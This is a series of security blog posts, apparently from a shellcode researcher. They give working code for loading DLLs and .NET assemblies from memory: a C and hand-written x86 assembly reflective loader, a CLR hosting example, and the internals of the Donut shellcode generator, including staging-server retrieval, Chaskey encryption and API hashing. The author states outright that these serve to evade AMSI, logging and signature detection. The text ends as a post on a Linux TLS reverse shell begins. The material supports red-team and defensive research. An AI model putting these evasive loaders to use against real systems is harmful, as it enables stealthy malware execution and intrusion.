    nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    
    // 1. Allocate RWX memory for file
    cs  = VirtualAlloc(
      NULL, nt->OptionalHeader.SizeOfImage, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
      
    // 2. Copy each section to RWX memory
    sh = IMAGE_FIRST_SECTION(nt);
      
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      memcpy((PBYTE)cs + sh[i].VirtualAddress,
          (PBYTE)base + sh[i].PointerToRawData,
          sh[i].SizeOfRawData);
    }
    
    // 3. Process the Import Table
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
      
    // For each DLL
    for (;imp->Name!=0; imp++) {
      name = RVA2VA(PCHAR, cs, imp->Name);
      
      // Load it
      dll = LoadLibrary(name);
      
      // Resolve the API for this library
      oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
        
      // For each API
      for (;; oft++, ft++) {
        // No API left?
        if (oft->u1.AddressOfData == 0) break;
        
        PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
        
        // Resolve by ordinal?
        if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
          *func = (ULONG_PTR)GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
        } else {
          // Resolve by name
          ibn   = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
          *func = (ULONG_PTR)GetProcAddress(dll, ibn->Name);
        }
      }
    }
    
    // 4. Apply Relocations
    rva  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
    ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
    ofs  = (PBYTE)cs - nt->OptionalHeader.ImageBase;
    
    while(ibr->VirtualAddress != 0) {
      list = (PIMAGE_RELOC)(ibr + 1);

      while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
        if(list->type == IMAGE_REL_TYPE) {
          *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
        }
        list++;
      }
      ibr = (PIMAGE_BASE_RELOCATION)list;
    }

    // 5. Execute entrypoint
    DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
    DllMain(cs, DLL_PROCESS_ATTACH, NULL);
}

x86 assembly

Using the exact same logic except implemented in hand-written assembly … for illustration of course!.

; DLL loader in 306 bytes of x86 assembly (written for fun)
; odzhan

      %include "ds.inc"

      bits   32

      struc _ds
          .VirtualAlloc        resd 1 ; edi
          .LoadLibraryA        resd 1 ; esi
          .GetProcAddress      resd 1 ; ebp
          .AddressOfEntryPoint resd 1 ; esp
          .ImportTable         resd 1 ; ebx
          .BaseRelocationTable resd 1 ; edx
          .ImageBase           resd 1 ; ecx
      endstruc

      %ifndef BIN
        global load_dllx
        global _load_dllx
      %endif
      
load_dllx:
_load_dllx: 
      pop    eax            ; eax = return address
      pop    ebx            ; ebx = base of PE file
      push   eax            ; save return address on stack
      pushad                ; save all registers
      call   init_api       ; load address of api hash onto stack
      dd     0x38194E37     ; VirtualAlloc
      dd     0xFA183D4A     ; LoadLibraryA
      dd     0x4AAC90F7     ; GetProcAddress
init_api:
      pop    esi            ; esi = api hashes
      pushad                ; allocate 32 bytes of memory for _ds
      mov    edi, esp       ; edi = _ds
      push   TEB.ProcessEnvironmentBlock
      pop    ecx
      cdq                   ; eax should be < 0x80000000
get_apis:
      lodsd                 ; eax = hash
      pushad
      mov    eax, [fs:ecx]
      mov    eax, [eax+PEB.Ldr]
      mov    edi, [eax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    get_dll
next_dll:    
      mov    edi, [edi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
get_dll:
      mov    ebx, [edi+LDR_DATA_TABLE_ENTRY.DllBase]
      mov    eax, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
      mov    ecx, [ebx+eax+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress]
      jecxz  next_dll
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions     
      lodsd
      add    eax, ebx        ; ebp = RVA2VA(eax, ebx)
      xchg   eax, ebp        ;
      ; edx = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      add    eax, ebx        ; edx = RVA2VA(eax, ebx)
      xchg   eax, edx        ;
      ; esi = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      add    eax, ebx        ; esi = RVA(eax, ebx)
      xchg   eax, esi
get_name:
      pushad
      mov    esi, [edx+ecx*4-4] ; esi = AddressOfNames[ecx-1]
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; eax = 0
      cdq                       ; h = 0
hash_name:    
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    eax
      jns    hash_name
      cmp    edx, [esp + _eax + pushad_t_size]   ; hashes match?
      popad
      loopne get_name              ; --ecx && edx != hash
      jne    next_dll              ; get next DLL        
      movzx  eax, word [esi+ecx*2] ; eax = AddressOfNameOrdinals[eax]
      add    ebx, [ebp+eax*4]      ; ecx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx
      popad                        ; restore all
      stosd
      inc    edx
      jnp    get_apis              ; until PF = 1
      
      ; dos = (PIMAGE_DOS_HEADER)ebx
      push   ebx
      add    ebx, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      add    ebx, ecx
      ; esi = &nt->OptionalHeader.AddressOfEntryPoint
      lea    esi, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint - 30h]
      movsd          ; [edi+ 0] = AddressOfEntryPoint
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_IMPORT * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 4] = Import Directory Table RVA
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_BASERELOC * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 8] = Base Relocation Table RVA
      lodsd          ; skip BaseOfCode
      lodsd          ; skip BaseOfData
      movsd          ; [edi+12] = ImageBase
      ; cs  = VirtualAlloc(NULL, nt->OptionalHeader.SizeOfImage, 
      ;          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      push   PAGE_EXECUTE_READWRITE
      xchg   cl, ch
      push   ecx
      push   dword[esi + IMAGE_OPTIONAL_HEADER32.SizeOfImage - \
                         IMAGE_OPTIONAL_HEADER32.SectionAlignment]
      push   0                           ; NULL
      call   dword[esp + _ds.VirtualAlloc + 5*4]
      xchg   eax, edi                    ; edi = cs
      pop    esi                         ; esi = base
      
      ; load number of sections
      movzx  ecx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.NumberOfSections - 30h]
      ; edx = IMAGE_FIRST_SECTION()
      movzx  edx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.SizeOfOptionalHeader - 30h]
      lea    edx, [ebx + edx + IMAGE_NT_HEADERS.OptionalHeader - 30h]
map_section:
      pushad
      add    edi, [edx + IMAGE_SECTION_HEADER.VirtualAddress]
      add    esi, [edx + IMAGE_SECTION_HEADER.PointerToRawData]
      mov    ecx, [edx + IMAGE_SECTION_HEADER.SizeOfRawData]
      rep    movsb
      popad
      add    edx, IMAGE_SECTION_HEADER_size
      loop   map_section
      mov    ebp, edi
      ; process the import table
      pushad
      mov    ecx, [esp + _ds.ImportTable + pushad_t_size]
      jecxz  imp_l2
      lea    ebx, [ecx + ebp]
imp_l0:
      ; esi / oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      mov    esi, [ebx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
      add    esi, ebp
      ; edi / ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
      mov    edi, [ebx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
      add    edi, ebp
      mov    ecx, [ebx+IMAGE_IMPORT_DESCRIPTOR.Name]
      add    ebx, IMAGE_IMPORT_DESCRIPTOR_size
      jecxz  imp_l2
      add    ecx, ebp         ; name = RVA2VA(PCHAR, cs, imp->Name);
      ; dll = LoadLibrary(name);
      push   ecx
      call   dword[esp + _ds.LoadLibraryA + 4 + pushad_t_size]  
      xchg   edx, eax         ; edx = dll
imp_l1:
      lodsd                   ; eax = oft->u1.AddressOfData, oft++;
      xchg   eax, ecx
      jecxz  imp_l0           ; if (oft->u1.AddressOfData == 0) break; 
      btr    ecx, 31
      jc     imp_Lx           ; IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)
      ; RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData)
      lea    ecx, [ebp + ecx + IMAGE_IMPORT_BY_NAME.Name]
imp_Lx:
      ; eax = GetProcAddress(dll, ecx);
      push   edx
      push   ecx
      push   edx
      call   dword[esp + _ds.GetProcAddress + 3*4 + pushad_t_size]  
      pop    edx
      stosd                   ; ft->u1.Function = eax
      jmp    imp_l1
imp_l2:
      popad
      ; ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, dir[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
      mov    esi, [esp + _ds.BaseRelocationTable]
      add    esi, ebp
      ; ofs  = (PBYTE)cs - opt->ImageBase;
      mov    ebx, ebp
      sub    ebp, [esp + _ds.ImageBase]
reloc_L0:
      ; while (ibr->VirtualAddress != 0) {
      lodsd                  ; eax = ibr->VirtualAddress
      xchg   eax, ecx
      jecxz  call_entrypoint
      lodsd                  ; skip ibr->SizeOfBlock
      lea    edi, [esi + eax - 8]
reloc_L1:
      lodsw                  ; ax = *(WORD*)list;
      and    eax, 0xFFF      ; eax = list->offset
      jz     reloc_L2        ; IMAGE_REL_BASED_ABSOLUTE is used for padding
      add    eax, ecx        ; eax += ibr->VirtualAddress
      add    eax, ebx        ; eax += cs
      add    [eax], ebp      ; *(DWORD*)eax += ofs
      ; ibr = (PIMAGE_BASE_RELOCATION)list;
reloc_L2:
      ; (PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock
      cmp    esi, edi
      jne    reloc_L1
      jmp    reloc_L0
call_entrypoint:
  %ifndef EXE
      push   ecx                 ; lpvReserved
      push   DLL_PROCESS_ATTACH  ; fdwReason    
      push   ebx                 ; HINSTANCE   
      ; DllMain = RVA2VA(entry_exe, cs, opt->AddressOfEntryPoint);
      add    ebx, [esp + _ds.AddressOfEntryPoint + 3*4]
  %else
      add    ebx, [esp + _ds.AddressOfEntryPoint]
  %endif
      call   ebx
      popad                  ; release _ds
      popad                  ; restore registers
      ret

Running a DLL from memory isn’t difficult if we ignore the export table, resources, TLS and subsystem. The only requirement is that the DLL has a relocation section. The C generated assembly will be used in a new version of Donut while sources in this post can be found here.

Posted in assembly, injection, programming, security, shellcode, windows | Tagged , , , | 4 Comments

Shellcode: Loading .NET Assemblies From Memory

Introduction

The dot net Framework can be found on almost every device running Microsoft Windows. It is popular among professionals involved in both attacking (Red Team) and defending (Blue Team) a Windows-based device. In 2015, the Antimalware Scan Interface (AMSI) was integrated with various Windows components used to execute scripts (VBScript, JScript, PowerShell). Around the same time, enhanced logging or Script Block Logging was added to PowerShell that allows capturing the full contents of scripts being executed, thereby defeating any obfuscation used. To remain ahead of blue teams, red teams had to go another layer deeper into the dot net framework by using assemblies. Typically written in C#, assemblies provide red teams with all the functionality of PowerShell, but with the distinct advantage of loading and executing entirely from memory. In this post, I will briefly discuss a tool called Donut, that when given a .NET assembly, class name, method, and optional parameters, will generate a position-independent code (PIC) or shellcode that can load a .NET assembly from memory. The project was a collaborative effort between myself and TheWover who has blogged about donut here.

Common Language Runtime (CLR) Hosting Interfaces

The CLR is the virtual machine component while the ICorRuntimeHost interface available since v1.0 of the framework (released in 2002) facilitates hosting .NET assemblies. This interface was superseded by ICLRRuntimeHost when v2.0 of the framework was released in 2006, and this was superseded by ICLRMetaHost when v4.0 of the framework was released in 2009. Although deprecated, ICorRuntimeHost currently provides the easiest way to load assemblies from memory. There are a variety of ways to instantiate this interface, but the most popular appears to be through one of the following:

CorBindToRuntime and CorBindToRuntimeEx functions perform the same operation, but the CorBindToRuntimeEx function allows us to specify the behavior of the CLR. CLRCreateInstance avoids having to initialize Component Object Model (COM) but is not implemented prior to v4.0 of the framework. The following code in C++ demonstrates running a dot net assembly from memory.

#include <windows.h>
#include <oleauto.h>
#include <mscoree.h>
#include <comdef.h>

#include <cstdio>
#include <cstdint>
#include <cstring>
#include <cstdlib>
#include <sys/stat.h>

#import "mscorlib.tlb" raw_interfaces_only

void rundotnet(void *code, size_t len) {
    HRESULT                  hr;
    ICorRuntimeHost          *icrh;
    IUnknownPtr              iu;
    mscorlib::_AppDomainPtr  ad;
    mscorlib::_AssemblyPtr   as;
    mscorlib::_MethodInfoPtr mi;
    VARIANT                  v1, v2;
    SAFEARRAY                *sa;
    SAFEARRAYBOUND           sab;
    
    printf("CoCreateInstance(ICorRuntimeHost).\n");
    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    
    hr = CoCreateInstance(
      CLSID_CorRuntimeHost, 
      NULL, 
      CLSCTX_ALL,
      IID_ICorRuntimeHost, 
      (LPVOID*)&icrh);
      
    if(FAILED(hr)) return;
    
    printf("ICorRuntimeHost::Start()\n");
    hr = icrh->Start();
    if(SUCCEEDED(hr)) {
      printf("ICorRuntimeHost::GetDefaultDomain()\n");
      hr = icrh->GetDefaultDomain(&iu);
      if(SUCCEEDED(hr)) {
        printf("IUnknown::QueryInterface()\n");
        hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
        if(SUCCEEDED(hr)) {
          sab.lLbound   = 0;
          sab.cElements = len;
          printf("SafeArrayCreate()\n");
          sa = SafeArrayCreate(VT_UI1, 1, &sab);
          if(sa != NULL) {
            CopyMemory(sa->pvData, code, len);
            printf("AppDomain::Load_3()\n");
            hr = ad->Load_3(sa, &as);
            if(SUCCEEDED(hr)) {
              printf("Assembly::get_EntryPoint()\n");
              hr = as->get_EntryPoint(&mi);
              if(SUCCEEDED(hr)) {
                v1.vt    = VT_NULL;
                v1.plVal = NULL;
                printf("MethodInfo::Invoke_3()\n");
                hr = mi->Invoke_3(v1, NULL, &v2);
                mi->Release();
              }
              as->Release();
            }
            SafeArrayDestroy(sa);
          }
          ad->Release();
        }
        iu->Release();
      }
      icrh->Stop();
    }
    icrh->Release();
}

int main(int argc, char *argv[])
{
    void *mem;
    struct stat fs;
    FILE *fd;
    
    if(argc != 2) {
      printf("usage: rundotnet <.NET assembly>\n");
      return 0;
    }
    
    // 1. get the size of file
    stat(argv[1], &fs);
    
    if(fs.st_size == 0) {
      printf("file is empty.\n");
      return 0;
    }
    
    // 2. try open assembly
    fd = fopen(argv[1], "rb");
    if(fd == NULL) {
      printf("unable to open \"%s\".\n", argv[1]);
      return 0;
    }
    // 3. allocate memory 
    mem = malloc(fs.st_size);
    if(mem != NULL) {
      // 4. read file into memory
      fread(mem, 1, fs.st_size, fd);
      // 5. run the program from memory
      rundotnet(mem, fs.st_size);
      // 6. free memory
      free(mem);
    }
    // 7. close assembly
    fclose(fd);
    
    return 0;
}

The following is a simple Hello, World! example in C# that when compiled with csc.exe will generate a dot net assembly for testing the loader.

// A Hello World! program in C#.
using System;
namespace HelloWorld
{
    class Hello 
    {
        static void Main() 
        {
            Console.WriteLine("Hello World!");
        }
    }
}

Compiling and running both of these sources gives the following results.

That’s a basic implementation of executing dot net assemblies and doesn’t take into consideration what runtime versions of the framework are supported. The shellcode works differently by resolving the address of CorBindToRuntime and CLRCreateInstance together which is similar to AssemblyLoader by subTee. If CLRCreateInstance is successfully resolved and invocation returns E_NOTIMPL or “Not implemented”, we execute CorBindToRuntime with the pwszVersion parameter set to NULL, which simply requests the latest version available. If we request a specific version from CorBindToRuntime that is not supported by the system, a host process running the shellcode might display an error message. For example, the following screenshot shows a request for v4.0.30319 on a Windows 7 machine that only supports v3.5.30729.5420.

You may be asking why the OLE functions used in the hosting example are not also used in the shellcode. OLE functions are sometimes referenced in another DLL like COMBASE instead of OLE32. xGetProcAddress can handle forward references, but for now at least, the shellcode uses a combination of CorBindToRuntime and CLRCreateInstance. CoCreateInstance may be used in newer versions.

Defining .NET Types

Types are accessible from an unmanaged C++ application using the #import directive. The hosting example uses _AppDomain, _Assembly and _MethodInfo interfaces defined in mscorlib.tlb. The problem, however, is that there’s no definition of the interfaces anywhere in the public version of the Windows SDK. To use a dot net type from lower-level languages like assembly or C, we first have to manually define them. The type information can be enumerated using the LoadTypeLib API which returns a pointer to the ITypeLib interface. This interface will retrieve information about the library while ITypeInfo will retrieve information about the library interfaces, methods and variables. I found the open source application Olewoo useful for examining mscorlib.tlb. If we ignore all the concepts of Object Oriented Programming (OOP) like class, object, inheritance, encapsulation, abstraction, polymorphism..etc, an interface can be viewed from a lower-level as nothing more than a pointer to a data structure containing pointers to functions/methods. I could not find any definition of the required interfaces online except for one file in phplib that partially defines the _AppDomain interface. Based on that example, I created the other interfaces necessary for loading assemblies. The following method is a member of the _AppDomain interface.

        HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
          IType        *This,
          BSTR         name,
          BindingFlags invokeAttr,
          IBinder      *Binder,
          VARIANT      Target,
          SAFEARRAY    *args,
          VARIANT      *pRetVal);

Although no methods of the IBinder interface are used in the shellcode and the type could safely be changed to void *, the following is defined for future reference. The DUMMY_METHOD macro simply defines a function pointer.

    typedef struct _Binder IBinder;

    #undef DUMMY_METHOD
    #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
    
    typedef struct _BinderVtbl {
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
          IBinder * This,
          /* [in] */ REFIID riid,
          /* [iid_is][out] */ void **ppvObject);

        ULONG ( STDMETHODCALLTYPE *AddRef )(
          IBinder * This);

        ULONG ( STDMETHODCALLTYPE *Release )(
          IBinder * This);
          
        DUMMY_METHOD(GetTypeInfoCount);
        DUMMY_METHOD(GetTypeInfo);
        DUMMY_METHOD(GetIDsOfNames);
        DUMMY_METHOD(Invoke);
        DUMMY_METHOD(ToString);
        DUMMY_METHOD(Equals);
        DUMMY_METHOD(GetHashCode);
        DUMMY_METHOD(GetType);
        DUMMY_METHOD(BindToMethod);
        DUMMY_METHOD(BindToField);
        DUMMY_METHOD(SelectMethod);
        DUMMY_METHOD(SelectProperty);
        DUMMY_METHOD(ChangeType);
        DUMMY_METHOD(ReorderArgumentArray);
    } BinderVtbl;
    
    typedef struct _Binder {
      BinderVtbl *lpVtbl;
    } Binder;

Methods required to load assemblies from memory are defined in payload.h.

Donut Instance

The shellcode will always be combined with a block of data referred to as an Instance. This can be considered the “data segment” of the shellcode. It contains the names of DLL to load before attempting to resolve API, 64-bit hashes of API strings, COM GUIDs relevant for loading .NET assemblies into memory and decryption keys for both the Instance, and the Module if one is stored on a staging server. Many shellcodes written in C tend to store strings on the stack, but tools like FireEye Labs Obfuscated String Solver can recover them with relative ease, helping to analyze the code much faster. One advantage of keeping strings in a separate data block is when it comes to the permutation of the code. It’s possible to change the code while retaining the functionality, but never having to work with “read-only” immediate values that would complicate the process and significantly increase the size of the code. The following structure represents what is placed after a call opcode and before a pop ecx / pop rcx. The fastcall convention is used for both x86 and x86-64 shellcodes and this makes it convenient to load a pointer to the Instance in ecx or rcx register.

typedef struct _DONUT_INSTANCE {
    uint32_t    len;                          // total size of instance
    DONUT_CRYPT key;                          // decrypts instance
    // everything from here is encrypted
    
    int         dll_cnt;                      // the number of DLL to load before resolving API
    char        dll_name[DONUT_MAX_DLL][32];  // a list of DLL strings to load
    uint64_t    iv;                           // the 64-bit initial value for maru hash
    int         api_cnt;                      // the 64-bit hashes of API required for instance to work

    union {
      uint64_t  hash[48];                     // holds up to 48 api hashes
      void     *addr[48];                     // holds up to 48 api addresses
      // include prototypes only if header included from payload.h
      #ifdef PAYLOAD_H
      struct {
        // imports from kernel32.dll
        LoadLibraryA_t             LoadLibraryA;
        GetProcAddress_t           GetProcAddress;
        VirtualAlloc_t             VirtualAlloc;             
        VirtualFree_t              VirtualFree;  
        
        // imports from oleaut32.dll
        SafeArrayCreate_t          SafeArrayCreate;          
        SafeArrayCreateVector_t    SafeArrayCreateVector;    
        SafeArrayPutElement_t      SafeArrayPutElement;      
        SafeArrayDestroy_t         SafeArrayDestroy;         
        SysAllocString_t           SysAllocString;           
        SysFreeString_t            SysFreeString;            
        
        // imports from wininet.dll
        InternetCrackUrl_t         InternetCrackUrl;         
        InternetOpen_t             InternetOpen;             
        InternetConnect_t          InternetConnect;          
        InternetSetOption_t        InternetSetOption;        
        InternetReadFile_t         InternetReadFile;         
        InternetCloseHandle_t      InternetCloseHandle;      
        HttpOpenRequest_t          HttpOpenRequest;          
        HttpSendRequest_t          HttpSendRequest;          
        HttpQueryInfo_t            HttpQueryInfo;
        
        // imports from mscoree.dll
        CorBindToRuntime_t         CorBindToRuntime;
        CLRCreateInstance_t        CLRCreateInstance;
      };
      #endif
    } api;
    
    // GUID required to load .NET assembly
    GUID xCLSID_CLRMetaHost;
    GUID xIID_ICLRMetaHost;  
    GUID xIID_ICLRRuntimeInfo;
    GUID xCLSID_CorRuntimeHost;
    GUID xIID_ICorRuntimeHost;
    GUID xIID_AppDomain;
    
    DONUT_INSTANCE_TYPE type;  // PIC or URL 
    
    struct {
      char url[DONUT_MAX_URL];
      char req[16];            // just a buffer for "GET"
    } http;

    uint8_t     sig[DONUT_MAX_NAME];          // string to hash
    uint64_t    mac;                          // to verify decryption ok
    
    DONUT_CRYPT mod_key;       // used to decrypt module
    uint64_t    mod_len;       // total size of module
    
    union {
      PDONUT_MODULE p;         // for URL
      DONUT_MODULE  x;         // for PIC
    } module;
} DONUT_INSTANCE, *PDONUT_INSTANCE;

Donut Module

A dot net assembly is stored in a data structure referred to as a Module. It can be stored with an Instance or on a staging server that the shellcode will retrieve it from. Inside the module will be the assembly, class name, method, and optional parameters. The sig value will contain a random 8-byte string that when processed with the Maru hash function will generate a 64-bit value that should equal the value of mac. This is to verify decryption of the module was successful. The Module key is stored in the Instance embedded with the shellcode.

// everything required for a module goes into the following structure
typedef struct _DONUT_MODULE {
    DWORD   type;                                   // EXE or DLL
    WCHAR   runtime[DONUT_MAX_NAME];                // runtime version
    WCHAR   domain[DONUT_MAX_NAME];                 // domain name to use
    WCHAR   cls[DONUT_MAX_NAME];                    // name of class and optional namespace
    WCHAR   method[DONUT_MAX_NAME];                 // name of method to invoke
    DWORD   param_cnt;                              // number of parameters to method
    WCHAR   param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters passed to method
    CHAR    sig[DONUT_MAX_NAME];                    // random string to verify decryption
    ULONG64 mac;                                    // to verify decryption ok
    DWORD   len;                                    // size of .NET assembly
    BYTE    data[4];                                // .NET assembly file
} DONUT_MODULE, *PDONUT_MODULE;

Random Keys

On Windows, CryptGenRandom generates cryptographically secure random values while on Linux, /dev/urandom is used instead of /dev/random because the latter blocks on read attempts. Thomas Huhn writes in Myths about /dev/urandom that /dev/urandom is the preferred source of cryptographic randomness on Linux. Now, I don’t suggest any of you reuse CreateRandom to generate random keys, but that’s how they’re generated in Donut.

Random Strings

Application Domain names are generated using a random string unless specified by the user generating a payload. If a donut module is stored on a staging server, a random name is generated for that too. The function that handles this is aptly named GenRandomString. Using random bytes from CreateRandom, a string is derived from the letters “HMN34P67R9TWCXYF”. The selection of these letters is based on a post by trepidacious about unambiguous characters.

Symmetric Encryption

An involution is simply a function that is its own inverse and many tools use involutions to obfuscate the code. If you’ve ever reverse engineered malware, you will no doubt be familiar with the eXclusive-OR operation that is used quite a lot because of its simplicity. A more complicated example of involutions can be the non-linear operation used for the Noekeon block cipher. Instead of involutions, Donut uses the Chaskey block cipher in Counter (CTR) mode to encrypt the module with the decryption key embedded in the shellcode. If a Donut module is recovered from a staging server, the only way to get information about what’s inside it is to recover the shellcode, find a weakness with the CreateRandom function or break the Chaskey cipher.

static void chaskey(void *mk, void *p) {
    uint32_t i,*w=p,*k=mk;

    // add 128-bit master key
    for(i=0;i<4;i++) w[i]^=k[i];
    
    // apply 16 rounds of permutation
    for(i=0;i<16;i++) {
      w[0] += w[1],
      w[1]  = ROTR32(w[1], 27) ^ w[0],
      w[2] += w[3],
      w[3]  = ROTR32(w[3], 24) ^ w[2],
      w[2] += w[1],
      w[0]  = ROTR32(w[0], 16) + w[3],
      w[3]  = ROTR32(w[3], 19) ^ w[0],
      w[1]  = ROTR32(w[1], 25) ^ w[2],
      w[2]  = ROTR32(w[2], 16);
    }
    // add 128-bit master key
    for(i=0;i<4;i++) w[i]^=k[i];
}

Chaskey was selected because it’s compact, simple to implement and doesn’t contain constants that would be useful in generating simple detection signatures. The main downside is that Chaskey is relatively unknown and therefore hasn’t received as much cryptanalysis as AES has. When Chaskey was first published in 2014, the recommended number of rounds was 8. In 2015, an attack against 7 of the 8 rounds was discovered showing that the number of rounds was too low of a security margin. In response to this attack, the designers proposed 12 rounds, but Donut uses the Long-term Support (LTS) version with 16 rounds.

API Hashing

If the hash of an API string is well known in advance of a memory scan, detecting Donut would be much easier. It was suggested in Windows API hashing with block ciphers that introducing entropy into the hashing process would help code evade detection for longer. Donut uses the Maru hash function which is built atop of the Speck block cipher. It uses a Davies-Meyer construction and padding similar to what’s used in MD4 and MD5. A 64-bit Initial Value (IV) is generated randomly and used as the plaintext to encrypt while the API string is used as the key.

static uint64_t speck(void *mk, uint64_t p) {
    uint32_t k[4], i, t;
    union {
      uint32_t w[2];
      uint64_t q;
    } x;
    
    // copy 64-bit plaintext to local buffer
    x.q = p;
    
    // copy 128-bit master key to local buffer
    for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i];
    
    for(i=0;i<27;i++) {
      // donut_encrypt 64-bit plaintext
      x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0];
      x.w[1] =  ROTR32(x.w[1],29) ^ x.w[0];
      
      // create next 32-bit subkey
      t = k[3];
      k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
      k[0] =  ROTR32(k[0],29) ^ k[3];
      k[1] = k[2]; k[2] = t;
    }
    // return 64-bit ciphertext
    return x.q;
}

Summary

Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully, that is correct. Source code can be found here.

Posted in assembly, encryption, malware, programming, security, shellcode, windows | Tagged , , , , , , | 2 Comments

Shellcode: A reverse shell for Linux in C with support for TLS/SSL

Shellcode: A reverse shell in C for Linux with support for TLS/SSL

  1. Introduction
  2. History
  3. Definitions
    1. Position-independent code (PIC)
    2. Position-independent executable (PIE)
    3. Thread Local Storage or Transport Layer Security (TLS)
    4. Address Space Layout Randomization (ASLR)
    5. Executable and Link Format (ELF)
  4. Base of Host Process
    1. Arbitrary Code Segment Address
    2. Process File System (procfs)
  5. ELF Layout
    1. File Header
    2. Program Header
    3. Section Header
    4. Dynamic Structure
    5. Symbol Structure
  6. Base of C Library (libc)
    1. Process File System (procfs)
    2. Global Offset Table (DT_PLTGOT)
    3. Debug Structure (DT_DEBUG)
    4. Thread Local Storage (TLS)
  7. Resolving Address of Functions
    1. ELF Hash Table (DT_HASH)
    2. GNU Hash Table (DT_GNU_HASH)
    3. Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)
    4. Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)
  8. Loading Shared Objects
    1. __libc_dlopen_mode and __libc_dlsym
    2. Using /etc/ld.so.conf.d/
  9. Reverse Shell using SSL/TLS
    1. Data Table
    2. Strings
    3. Compiling
    4. Testing
  10. Summary

1. Introduction

This post will describe how to implement a position-independent code for Linux that can resolve the address of functions in the GNU C Library. The GNU Compiler Collection on an AMD64 build of Debian Linux will be used to compile a source code in C and extract the shellcode from binary. Once you’re familiar with the entire process, writing shellcode for other architectures should be easier. There are many tutorials about writing shellcode for Linux using system calls, but very few, if any at all, using the GNU C Library. The lack of tutorials can be attributed to the fact that process management, file system operations and network connectivity, can be easily implemented on Linux using system calls. In contrast with Linux, the Windows kernel is based on subsystems where the invocation of system calls is not a simple straight forward process. Due to the complexity of system calls on windows, it’s necessary to resolve the address of wrapper functions in Dynamic-link Libraries to do anything useful. This is why tutorials about writing shellcode in C for Windows well outnumber 